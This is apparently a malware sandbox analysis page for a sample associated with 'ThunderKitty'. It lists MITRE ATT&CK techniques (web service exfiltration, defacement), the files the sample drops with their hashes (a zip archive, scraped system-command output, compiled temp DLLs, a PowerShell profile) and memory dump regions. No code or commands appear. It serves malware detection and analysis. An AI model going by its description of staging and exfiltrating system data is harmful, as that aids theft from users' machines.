Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
98608aeba29dda9a58da36009df5abf8

SHA1
fc81bc843fd1615ab287f12619b13e67fe08e858

SHA256
8fce0d482a779242c11c5e0d4e4e63076006ff9bc5640faf5f2819db416a8fcc

SHA512
94a0d4adc11bdbc3eae4da747fea9ebe5c66b8c5fd5ef7fbc7a56a0de117dc1ab211150f715b100dd865c2adcf2290ad84ddbc4f07ca07cde37d5c6fc78a2d83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c18e55fadceb55c96c68877ca0b33128

SHA1
f58a6d92da219d09cb9fba8ddcaff2ad5e94dffa

SHA256
76286c774e5a232d707d4140991c150cd1053bbcb355e08ff88b9ea50fd1bc66

SHA512
4f52b8558d9daefc695ac6d9a0a6c605754e6363f9bf2d85b16732f367aac5e2e20d467d5b02559261954a01f4fdfbfa3c2a67955dbaa2e8c454cb1dc9947436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e2ffae1f09795d880e4d1050fb5e1194

SHA1
391a821a754b15654be7cf18347bac67f1bbc682

SHA256
b1e3a0e39734520d8c3b6afa8feeb4bf70890a653939f0727502e66c029f41cb

SHA512
7de2152fced393682299e5f4225b6d90e1e15aaaf4e80e749ea6f5567813532f77972652cfa855ced4ff084784d916caf71f4bdffb96662e884acd46302e5bec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC3BD.tmp

Filesize
1KB

MD5
67fb29b8c98138f817646d5a9349ecec

SHA1
a19053731a7bf52bcac30650f75d4c566de11e00

SHA256
c11ff5f4e41bcc0fcd2c985b5728d363dd238f26129f10a161c5e72303ea7d79

SHA512
d8050591ca08b639e3bccfbc95bf431f4f77486eb6d57dc4daa4ab57cd9953b7bf57219146ccadcb243dec87bc4d4a96a087c67230dc1de0066c00068bdd3d91

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC3CD.tmp

Filesize
1KB

MD5
3342be72bdd5ea3494a58f9dc80e558b

SHA1
39ca337908784d0bd2ee95e123b5fb27aff4707c

SHA256
6b565aeb54fcff3e07f66a9295a0b8827e442d2953b33943974e54dc815005bc

SHA512
033f1e822cee122dfcc2533ad11f992c2da21840974f1c61292198cbf868614f86c3bd328d4602bec328d683566b83e77ad174bcd635e612d3f518d14459f7e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
88KB

MD5
604952063febf0ecca6702ea682cbec4

SHA1
da896ffea0a71eb11f5ffc6e9ee021c39951f343

SHA256
f53cc6690ad00c9384501d2be9be2e2ede4163492c9f22677fd4fc7e5378f3eb

SHA512
235b28916cd0f26d2bc7ec5c00dcac3a0a17feb269675a3088c860d2b86f9f8681c59f5614d127c78c789054e6506e65759c3505d508fb690572da2d9763e4ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
25KB

MD5
04232f4d514ef1ca58e7b7dcad1e4dc2

SHA1
958218f054cd4c157d8dd4c4dbfb648d45201ac9

SHA256
7b5abb4e300cabf3591921c6818903e242c501fdd2d9e22ca9337e1e63c3e46a

SHA512
6290e7ce3cd4fc560f74c40c31b29da67d83aa0cc53ac21f1da6ea9c012f5b4a3ad8995cc3e1c22f8df12b0824d2f5663110f4df03babc94f960f61043596726

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vkn3w3yr.hhz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c2ycntp5\c2ycntp5.dll

Filesize
4KB

MD5
603093788f46cc4ae68b42fb6e5b1e4c

SHA1
ce262708c0191e87cb0f084defaa5c5d9b3bba5a

SHA256
be6ecf7bdc98ae20736d36036f3f36ef48e5ffbeb442fb52c81a4c7d08ba0dbc

SHA512
553085a1b9b3b4d7430db1474702cfdb3b6efd9e4ad3fbc58152b4a968bb865b7fd899f69d6d09145414673042a639a8c77792cb43697bd6c4d2cbde72bc0495

Download Submit
C:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.dll

Filesize
4KB

MD5
e860c2965ec8aaf6238a12a113017f85

SHA1
42282a2e91de254aa8637fba6b4b408ec14d3a84

SHA256
96d3d83ccc46ae68c3a91a5973edd1cc36f07e69755ad09dbaaae3f81e3581a1

SHA512
7974b0aa3cc6965da988c2ef527570e154bca70103a6f43d514f115a2d741eae2a13a73f5b28592ddf90604f73b698d85f299e191eca645f36d242184d647107

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c2ycntp5\CSC48757552B064EF0AEE84634B4C54E1.TMP

Filesize
652B

MD5
32de9e8b3593dfc48ddde4457edd8301

SHA1
ae93e83fb38df6e74b6a02c4f94ddb20db5fb73f

SHA256
c8b63d074f31b8cfd7f2de22d3dd2efdbf993b76b0963e922148401f31d128b9

SHA512
4ab26e57a11229e112739e09a8cab5dd078ca9ae112f459d316964686819516556436fd68d94ab3701726e45763da614af2e2b148abcbbe4d46d4c5a36c2a2d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c2ycntp5\c2ycntp5.cmdline

Filesize
369B

MD5
663400a2a7f1cafa4dfca092db447c69

SHA1
660732d06c05b65d140e372f686d52627a95acc9

SHA256
9f9ceecf9f3723a7af52efc0a8b887661b52df61700d27afa0cd6b53c5089e62

SHA512
c6cf9f06c122e49ac7b9f62f1b60358562a11c8abfa88979139268f507e233c93869a7a5ade2bce54fef3e5f709822898badc0cc0e8fac2478d19c4d181e15f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ibddl0bw\CSC7F4B9DDB4DDB42EE83C5CF7EB84D7A6B.TMP

Filesize
652B

MD5
5482cefbab214ed3f53c2f8114475f98

SHA1
16423c119fd3900e68fd677af4e078bb392d205e

SHA256
52e3c3e1234349c6095c3d336cb8f5ecc976a89f6aa3fd32c94be6c1fc435408

SHA512
20e4d2d8edbcab7a275d981467d976d750778012afe3a321e8e4092f0c4f025313c577cd538be0bba76c34fb98f3c056766a089a5dbd0ae479626531b410e6d9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.cmdline

Filesize
369B

MD5
bc966e0a1d36272371d535d912f8f488

SHA1
4a382577467ad8c6fefc1b58674b2777f5c1a5a6

SHA256
4b3fff765af08b11a6a85394db466b57f64f24b9797aee247577463412576fbc

SHA512
79fa830cba702dc7a530a5c662404ce141c097dd1564d6cb30bcd75e26efe789e8dcf53fbe69a9cbff0eb149d3181daad0516dcc3599240a027e7c2f70cee0bd

Download Submit
memory/2120-77-0x0000025DD0960000-0x0000025DD0968000-memory.dmp

Filesize
32KB

Download
memory/2120-90-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/2120-89-0x0000025DEAB00000-0x0000025DEAD1C000-memory.dmp

Filesize
2.1MB

Download
memory/2120-33-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/2120-28-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/2120-22-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/4740-50-0x000002787BC40000-0x000002787BE5C000-memory.dmp

Filesize
2.1MB

Download
memory/4740-41-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/4740-1-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/4740-16-0x0000027879B60000-0x0000027879B82000-memory.dmp

Filesize
136KB

Download
memory/4740-53-0x00007FF9EF570000-0x00007FF9F0031000-memory.dmp

Filesize
10.8MB

Download
memory/4740-0-0x00007FF9EF573000-0x00007FF9EF575000-memory.dmp

Filesize
8KB

Download
memory/5008-127-0x000002A9370A0000-0x000002A9372BC000-memory.dmp

Filesize
2.1MB

Download
memory/5020-93-0x00000215B9060000-0x00000215B908A000-memory.dmp

Filesize
168KB

Download
memory/5020-79-0x00000215B9710000-0x00000215B9EB6000-memory.dmp

Filesize
7.6MB

Download
memory/5020-129-0x00000215B90A0000-0x00000215B90B2000-memory.dmp

Filesize
72KB

Download
memory/5020-130-0x00000215B8E00000-0x00000215B8E0A000-memory.dmp

Filesize
40KB

Download
memory/5020-94-0x00000215B9060000-0x00000215B9084000-memory.dmp

Filesize
144KB

Download
memory/5020-139-0x00000215B8830000-0x00000215B8A4C000-memory.dmp

Filesize
2.1MB

Download
memory/5020-70-0x000002159E5A0000-0x000002159E5A8000-memory.dmp

Filesize
32KB

Download